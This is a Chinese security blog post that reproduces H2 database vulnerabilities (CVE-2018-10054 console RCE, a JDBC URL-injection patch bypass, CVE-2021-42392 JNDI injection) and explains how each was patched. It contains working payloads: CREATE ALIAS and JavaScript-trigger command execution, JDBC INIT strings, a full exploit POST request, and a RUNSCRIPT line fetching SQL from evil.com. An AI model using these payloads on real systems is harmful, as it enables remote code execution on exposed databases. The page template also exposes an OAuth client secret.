

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/tab-about/red_bear.jpg">
  <link rel="icon" href="/img/tab-about/red_bear.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="k3ppf0r">
  <meta name="keywords" content="JDBC,java,RCE">
  
    <meta name="description" content="h2database漏洞梳理与条件限制下漏洞利用初步探讨">
<meta property="og:type" content="article">
<meta property="og:title" content="h2database 漏洞梳理">
<meta property="og:url" content="https://k3ppf0r.github.io/2025/07/06/WEB/h2database/index.html">
<meta property="og:site_name" content="k3ppf0r&#39;s blog">
<meta property="og:description" content="h2database漏洞梳理与条件限制下漏洞利用初步探讨">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://k3ppf0r.github.io/img/post-WEB/h2database.png">
<meta property="article:published_time" content="2025-07-06T07:00:00.000Z">
<meta property="article:modified_time" content="2025-07-07T17:01:00.000Z">
<meta property="article:author" content="k3ppf0r">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="JDBC">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://k3ppf0r.github.io/img/post-WEB/h2database.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>h2database 漏洞梳理 - k3ppf0r&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/prism/1.28.0/plugins/line-numbers/prism-line-numbers.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"k3ppf0r.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":2},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null},"gtag":null,"woyaola":null,"cnzz":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>k3ppf0r&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/0-post-default/post.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="h2database 漏洞梳理"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-06 15:00" pubdate>
          2025年7月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          12 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">h2database 漏洞梳理</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年7月8日 凌晨
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <p>由于工作中遇到了h2 数据库，故想着系统点梳理复现下h2 数据库 的一些漏洞，并初步探讨各种场景与限制下的漏洞利用。</p>
<h1 id="Web-Console-RCE（CVE-2018-10054）"><a href="#Web-Console-RCE（CVE-2018-10054）" class="headerlink" title="Web Console RCE（CVE-2018-10054）"></a>Web Console RCE（CVE-2018-10054）</h1><p>当Spring Boot集成H2 Database时，如果设置如下选项，将会启用一个Web管理页面：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-none"><code class="language-none">spring.h2.console.enabled&#x3D;true
spring.h2.console.settings.web-allow-others&#x3D;true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></div></figure>

<figure><div class="code-wrapper"><pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dependency</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>groupId</span><span class="token punctuation">></span></span>org.springframework.boot<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>groupId</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>artifactId</span><span class="token punctuation">></span></span>spring-boot-starter-web<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>artifactId</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>version</span><span class="token punctuation">></span></span>2.7.18<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>version</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>dependency</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></div></figure>

<p>在<code>1.4.198</code>之前的H2 Database版本中，任何用户都可以通过创建新的数据库文件或连接到内存数据库来访问Web管理页面。认证通过后，攻击者可以通过以下命令之一执行任意代码：</p>
<ul>
<li><code>CREATE ALIAS func AS code...; CALL func ...</code> （需要有<code>javac</code> ）</li>
<li><code>CREATE TRIGGER ... AS code...</code></li>
<li><code>RUNSCRIPT FROM &#39;http://evil.com/script.sql&#39;</code></li>
<li><code>JDBC Attack</code> （前台）</li>
</ul>
<h2 id="JDK环境"><a href="#JDK环境" class="headerlink" title="JDK环境"></a>JDK环境</h2><p>当目标环境中存在 <code>javac</code>（JDK 环境），可通过 CREATE ALIAS 定义 Java 方法RCE：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token constant">CREATE</span> <span class="token constant">ALIAS</span> <span class="token constant">EXEC</span> <span class="token constant">AS</span> '<span class="token class-name">String</span> <span class="token function">rce</span><span class="token punctuation">(</span><span class="token class-name">String</span> cmd<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name"><span class="token namespace">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span></span>IOException</span> <span class="token punctuation">&#123;</span><span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span>cmd<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token keyword">return</span> <span class="token string">"test"</span><span class="token punctuation">;</span><span class="token punctuation">&#125;</span>'<span class="token punctuation">;</span>
<span class="token class-name">CALL</span> <span class="token constant">EXEC</span> <span class="token punctuation">(</span>'<span class="token keyword">open</span> <span class="token operator">-</span>a <span class="token class-name">Calculator</span><span class="token punctuation">.</span>app'<span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></div></figure>

<h2 id="JavaScript"><a href="#JavaScript" class="headerlink" title="JavaScript"></a>JavaScript</h2><p>当目标Java版本较低（Java 15 以后 Java 自带的 Nashorn JavaScript 引擎被删除），可通过 JavaScript 方法RCE：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">CREATE</span> <span class="token keyword">TRIGGER</span> shell3 BEFORE <span class="token keyword">SELECT</span> <span class="token keyword">ON</span> INFORMATION_SCHEMA<span class="token punctuation">.</span><span class="token keyword">TABLES</span> <span class="token keyword">AS</span> $$<span class="token comment">//javascript</span>
    var <span class="token operator">is</span> <span class="token operator">=</span> java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>Runtime<span class="token punctuation">.</span>getRuntime<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">exec</span><span class="token punctuation">(</span><span class="token string">"id"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>getInputStream<span class="token punctuation">(</span><span class="token punctuation">)</span>
    var scanner <span class="token operator">=</span> new java<span class="token punctuation">.</span>util<span class="token punctuation">.</span>Scanner<span class="token punctuation">(</span><span class="token operator">is</span><span class="token punctuation">)</span><span class="token punctuation">.</span>useDelimiter<span class="token punctuation">(</span><span class="token string">"\\A"</span><span class="token punctuation">)</span>
    throw new java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>Exception<span class="token punctuation">(</span>scanner<span class="token punctuation">.</span><span class="token keyword">next</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
$$<span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></div></figure>

<p>效果如图，<code>id</code>命令被成功执行，结果以异常的形式被抛出：<br><img src="/2025/07/06/WEB/h2database/id.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="远程执行sql"><a href="#远程执行sql" class="headerlink" title="远程执行sql"></a>远程执行sql</h2><p>第三种远程调用即把sql文件的内容写成上方语句即可：<br><img src="/2025/07/06/WEB/h2database/RUNSCRIPT.png" srcset="/img/loading.gif" lazyload alt="RUNSCRIPT"></p>
<h2 id="JDBC-Attack"><a href="#JDBC-Attack" class="headerlink" title="JDBC Attack"></a>JDBC Attack</h2><p>在第四种方法打JDBC，需要注意 <code>CVE-2018-10054</code> 的前提条件是能进入到后台执行 sql 处的页面，而 p牛 在文章中指出，通过 jdbc attack 的方式可以实现前台攻击：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-none"><code class="language-none">jdbc:h2:mem:test;MODE&#x3D;MSSQLServer;INIT&#x3D;CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$&#x2F;&#x2F;javascript
    java.lang.Runtime.getRuntime().exec(&quot;open -a Calculator.app&quot;)
$$;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></div></figure>
<p>数据包如下：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-none"><code class="language-none">POST &#x2F;h2-console&#x2F;test.do?jsessionid&#x3D;10a8dfbea8f1051801c4a5135ecaccea HTTP&#x2F;1.1
Host: localhost:8888
User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko&#x2F;20100101 Firefox&#x2F;140.0
Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,*&#x2F;*;q&#x3D;0.8
Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application&#x2F;x-www-form-urlencoded
Content-Length: 347
Connection: keep-alive
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8&#x3D;1743061416,1743386457; lang&#x3D;zh-CN
Upgrade-Insecure-Requests: 1
Priority: u&#x3D;0, i

language&#x3D;en&amp;setting&#x3D;Generic+H2+%28Embedded%29&amp;name&#x3D;Generic+H2+%28Embedded%29&amp;driver&#x3D;org.h2.Driver&amp;url&#x3D;jdbc%3ah2%3amem%3atest%3bMODE%3dMSSQLServer%3bINIT%3dCREATE+TRIGGER+shell3+BEFORE+SELECT+ON+INFORMATION_SCHEMA.TABLES+AS+%24%24%2f%2fjavascript%0a++++java.lang.Runtime.getRuntime().exec(%22open+-a+Calculator.app%22)%0a%24%24%3b&amp;user&#x3D;sa&amp;password&#x3D;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div></figure>

<p><img src="/2025/07/06/WEB/h2database/test.do.png" srcset="/img/loading.gif" lazyload alt="JDBC攻击"></p>
<p>在后续修复的 <code>1.4.198</code> 版本中，存在这样的一个补丁：默认h2 数据库不允许创建新的数据库（ jdbc 连接url拼接 <code>;FORBID_CREATION=TRUE</code> ）</p>
<p>我们可以看下改动代码部分来观察如何打补丁的 ：<br><code>org.h2.server.web.WebServer#getConnection</code><br><img src="/2025/07/06/WEB/h2database/h2WebServer-1.4.197.png" srcset="/img/loading.gif" lazyload alt="未改动之前"></p>
<p>如上图，在没有打补丁之前，这里只是会判断数据库是否存在，如果不存在，则不会添加<code>IFEXISTS=TRUE</code>，那么在方法内部会隐式创建其内存数据库，进而达到JDBC注入的效果。 我们再来看看补丁改动之后的代码：</p>
<p><code>https://github.com/h2database/h2database/compare/version-1.4.197...version-1.4.199</code></p>
<p><img src="/2025/07/06/WEB/h2database/diff-1.4.197-1.png" srcset="/img/loading.gif" lazyload alt="diff-1.4.197-1"></p>
<p><img src="/2025/07/06/WEB/h2database/diff-1.4.197-2.png" srcset="/img/loading.gif" lazyload alt="diff-1.4.197-2"></p>
<p>可以看出，<code>IFEXISTS=TRUE</code> 被默认添加进入了<code>databaseURl</code>，然而数据库并不存在，故到后续会抛出异常，达到了阻止漏洞利用的目的。<br>具体报错看图：</p>
<p><img src="/2025/07/06/WEB/h2database/199-error.png" srcset="/img/loading.gif" lazyload alt="error"></p>
<p>此时只能期待蒙对内部代码创建的已存在数据库名？比如存在这样的代码：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token class-name">String</span> jdbcUrlCreate <span class="token operator">=</span> <span class="token string">"jdbc:h2:mem:test;DB_CLOSE_DELAY=-1"</span><span class="token punctuation">;</span> <span class="token comment">// 用于创建数据库的连接字符串</span>
<span class="token comment">// 1. 显式创建数据库</span>
<span class="token keyword">try</span> <span class="token punctuation">(</span><span class="token class-name">Connection</span> connection <span class="token operator">=</span> <span class="token class-name">DriverManager</span><span class="token punctuation">.</span><span class="token function">getConnection</span><span class="token punctuation">(</span>jdbcUrlCreate<span class="token punctuation">,</span> <span class="token string">"sa"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token class-name">System</span><span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"Database 'test' created successfully."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">SQLException</span> e<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token class-name">System</span><span class="token punctuation">.</span>err<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"Error creating database: "</span> <span class="token operator">+</span> e<span class="token punctuation">.</span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span><span class="token punctuation">;</span> <span class="token comment">// 提前退出，避免后续连接尝试</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div></figure>
<figure><div class="code-wrapper"><pre class="line-numbers language-output" data-language="output"><code class="language-output">...
Database &#39;test&#39; created successfully.
...<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></div></figure>
<p>其实，还是是有办法攻击的，可通过在databaseUrl 末尾添加反斜杠， 将分号用反斜线转义，分号就会变成一个普通字符串，这样就把源代码中写的拼接字符串 <code>;IFEXISTS=TRUE</code> 弄失效。</p>
<p>由于h2database的开发历史，这里存在两种情况：在2.0.202版本 引入<code>IGNORE_UNKNOWN_SETTINGS</code> 忽略未知名字属性这个选项之前和之后：</p>
<ul>
<li>在引入 <code>IGNORE_UNKNOWN_SETTINGS</code> 之前，也就是版本 <code>1.4.198</code> 到 <code>2.0.202</code> 之间:</li>
</ul>
<p>通过注入已知的属性名比如 <code>AUTHZPWD</code>：</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-none"><code class="language-none">jdbc:h2:mem:test;MODE&#x3D;MSSQLServer;INIT&#x3D;CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$&#x2F;&#x2F;javascript
    java.lang.Runtime.getRuntime().exec(&quot;open -a Calculator.app&quot;)
$$;AUTHZPWD&#x3D;&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></div></figure>
<p><img src="/2025/07/06/WEB/h2database/202-before.png" srcset="/img/loading.gif" lazyload alt="before 2.0.202"></p>
<p>在版本 <code>1.4.198</code> 到 <code>2.0.210</code> 之间，可支持不识别的属性（<del>更无脑了</del>）</p>
<p>在版本<code>2.1.210</code>中<code>JDBC Attack</code>被修复，也就是说在版本<code>2.1.210</code>及其之后，Web console登陆页面的RCE问题已被修复。</p>
<h1 id="Web-Console-JNDI-Injection（CVE-2021-42392）"><a href="#Web-Console-JNDI-Injection（CVE-2021-42392）" class="headerlink" title="Web Console JNDI Injection（CVE-2021-42392）"></a>Web Console JNDI Injection（CVE-2021-42392）</h1><p>再来关注一下<code>1.4.198</code>之后版本的这部分代码：<br><code>org.h2.util.JdbcUtils#getConnection</code></p>
<p><img src="/2025/07/06/WEB/h2database/199-getConnection.png" srcset="/img/loading.gif" lazyload alt="getConnection"></p>
<p>可以看出，这段代码会判断加载进来的 Driver Class  是否实现了 <code>java.sql.Driver</code>接口（父类） 或者<code>javax.naming.Context</code>接口（父类） ，也就是判断加载的类是否是一个 JDBC 驱动程序或 JNDI 上下文，从而选择合适的连接方法。</p>
<p>Web Console 页面上默认的连接是 <code>org.h2.Driver</code> , 其是实现的java.sql.Driver接口。</p>
<figure><div class="code-wrapper"><pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Driver</span> <span class="token keyword">implements</span> <span class="token class-name"><span class="token namespace">java<span class="token punctuation">.</span>sql<span class="token punctuation">.</span></span>Driver</span><span class="token punctuation">,</span> <span class="token class-name">JdbcDriverBackwardsCompat</span> <span class="token punctuation">&#123;</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></div></figure>

<p>也就是说，我们可以修改默认的 <code>Driver Class</code> 为<code>javax.naming.Context</code>，从而实现JNDI注入。</p>
<p>后续JNDI注入的问题在<code>2.0.206</code>中被修复。</p>
<h1 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h1><ul>
<li><a target="_blank" rel="noopener" href="https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html">https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/45506">https://www.exploit-db.com/exploits/45506</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/h2database/h2database/issues/1225">https://github.com/h2database/h2database/issues/1225</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/h2database/h2database/pull/1580">https://github.com/h2database/h2database/pull/1580</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/h2database/h2database/pull/1726">https://github.com/h2database/h2database/pull/1726</a></li>
<li><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/talk-about-h2database-rce.html">https://www.leavesongs.com/PENETRATION/talk-about-h2database-rce.html</a></li>
<li><a target="_blank" rel="noopener" href="https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/">https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/</a></li>
<li><a target="_blank" rel="noopener" href="https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#%E5%8F%97%E9%99%90%E5%88%B6%E7%9A%84-jdbc-h2-rce">https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#%E5%8F%97%E9%99%90%E5%88%B6%E7%9A%84-jdbc-h2-rce</a></li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WEB/" class="category-chain-item">WEB</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/RCE/" class="print-no-link">#RCE</a>
      
        <a href="/tags/JDBC/" class="print-no-link">#JDBC</a>
      
        <a href="/tags/java/" class="print-no-link">#java</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>h2database 漏洞梳理</div>
      <div>https://k3ppf0r.github.io/2025/07/06/WEB/h2database/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>k3ppf0r</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年7月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/06/10/%E6%9D%82/MacOS%E4%BD%BF%E7%94%A8%E6%8A%80%E5%B7%A7/" title="MacOS使用技巧">
                        <span class="hidden-mobile">MacOS使用技巧</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"Ov23liMVKVOtuwYuvkw8","clientSecret":"9cb05e91f4572848c2255807ec06c72dcf447340","repo":"blog-gitalk-comments","owner":"k3ppf0r","admin":["k3ppf0r"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":false,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: 'ee03911c63c4d4ae9d77067b90b0ecc5'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
